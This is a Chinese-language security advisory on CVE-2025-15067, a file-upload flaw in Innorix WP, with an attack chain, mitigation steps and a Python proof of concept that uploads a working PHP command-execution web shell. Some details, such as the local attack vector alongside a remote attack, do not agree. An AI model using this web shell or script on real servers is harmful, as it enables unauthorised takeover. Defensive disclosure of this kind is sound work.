CVE-2025-15067 CVSS 7.7 高危

CVE-2025-15067: Innorix WP存在危险类型文件上传漏洞可导致RCE

披露日期: 2025-12-29

来源: 09832df1-09c1-45b4-8a85-16c601d30feb

漏洞信息

漏洞编号

CVE-2025-15067

漏洞类型

危险类型文件无限制上传/远程代码执行

CVSS评分

7.7 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Innorix Innorix WP (所有版本)

漏洞概述

CVE-2025-15067是Innorix Innorix WP产品中的一个高危安全漏洞，CVSS评分达到7.7。该漏洞属于危险类型文件无限制上传（Unrestricted Upload of File with Dangerous Type）类别，攻击者可利用此漏洞将Web Shell上传至Web服务器，从而实现远程代码执行（RCE）。漏洞影响Innorix WP的所有版本，当产品安装目录下存在"exam"目录时，攻击者即可利用此漏洞进行攻击。由于该漏洞无需认证即可利用，且对机密性和完整性造成严重影响，因此被评定为高危级别。建议受影响的用户尽快采取修复措施，包括删除或限制"exam"目录的访问权限，并关注厂商发布的安全更新。

技术细节

该漏洞存在于Innorix Innorix WP的文件上传功能模块中。攻击者可以利用存在的产品安装目录下的"exam"目录，通过构造恶意文件上传请求，将包含恶意代码的Web Shell（如PHP、JSP或ASP脚本）上传到服务器。由于系统未对上传文件的类型和内容进行充分的安全验证，攻击者可以成功上传任意类型的文件。一旦Web Shell上传成功，攻击者可以通过访问该文件在服务器上执行任意系统命令，从而完全控制受影响的服务器。此漏洞的利用条件相对简单，无需认证凭证，也不需要用户交互，攻击者可以直接发起攻击。攻击成功后，攻击者可以读取服务器上的敏感文件、修改系统配置、安装后门程序，甚至横向移动到内网中的其他系统。

攻击链分析

STEP 1

步骤1

扫描目标服务器，确认Innorix WP产品安装路径下存在"exam"目录

STEP 2

步骤2

构造恶意Web Shell文件（PHP/JSP/ASP），包含执行系统命令的代码

STEP 3

步骤3

向服务器发送文件上传请求，目标路径为/innorix/exam/目录

STEP 4

步骤4

服务器未验证文件类型，直接保存恶意文件到可访问目录

STEP 5

步骤5

通过HTTP请求访问上传的Web Shell，携带命令参数执行任意系统命令

STEP 6

步骤6

获得服务器完全控制权限，可进行数据窃取、横向移动或部署持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-15067 PoC - Innorix WP Unrestricted File Upload
# This PoC demonstrates uploading a web shell to the exam directory

import requests
import sys

target_url = "http://target-server/innorix/exam/upload"

# PHP Web Shell
web_shell = """<?php
if(isset($_GET['cmd'])) {
    echo '<pre>';
    $cmd = $_GET['cmd'];
    system($cmd);
    echo '</pre>';
}
?>"""

files = {
    'file': ('shell.php', web_shell, 'application/x-php')
}

try:
    print("[*] Attempting to upload web shell to target...")
    response = requests.post(target_url, files=files, timeout=10)
    
    if response.status_code == 200:
        print("[+] Web shell uploaded successfully!")
        print(f"[+] Access shell at: {target_url}/shell.php?cmd=whoami")
    else:
        print(f"[-] Upload failed with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

Innorix Innorix WP < 所有版本（所有版本均受影响）

防御指南

临时缓解措施

立即删除Innorix WP安装目录下的"exam"目录，或将其移出Web根目录以防止直接访问。同时配置Web服务器（如Apache、Nginx）对该目录设置严格的访问控制，禁止脚本执行权限。建议使用Web应用防火墙（WAF）监控和拦截异常的文件上传行为。在官方发布安全补丁前，可通过限制上传目录的写入权限作为临时缓解措施。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15067
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15067
3 Details https://www.cvedetails.com/cve/CVE-2025-15067/
4 VulDB https://vuldb.com/cve/CVE-2025-15067
5 Link https://www.gnit.co.kr/software/innorix_product.html
6 Link https://www.innorix.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表